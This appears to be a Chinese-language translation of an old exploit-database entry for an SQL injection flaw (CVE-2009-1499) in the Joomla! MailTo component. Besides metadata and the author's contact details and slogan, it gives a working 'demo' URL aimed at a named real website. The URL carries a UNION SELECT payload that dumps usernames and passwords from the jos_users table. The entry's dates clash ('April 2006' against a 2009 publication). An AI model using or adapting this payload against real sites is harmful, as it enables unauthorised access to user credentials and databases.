漏洞信息 基本信息 标题: Joomla! Component MailTo - 'article' SQL Injection Edb-ID: 8366 CVE: 2009-1499 作者: H!TM@N 类型: WEBAPPS 平台: PHP 发布日期: 2009-04-08 易受攻击的应用: Joomla! MailTo (com_mailto) 组件 漏洞详情 漏洞描述: Joomla! MailTo 组件存在 SQL 注入漏洞。 发现者: H!tm@N 联系方式: khghitman[at]gmail[dot]com 网站: www.khg-crew.ws 组件: MailTo (com_mailto) 日期: April 2006 利用方式 利用路径: 示例: 其他信息 演示地址: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--+&Itemid=1 作者声明: Proud to be Albanian, Proud to be Muslim, R.I.P redc00de 来源: milw0rm.com [2009-04-08]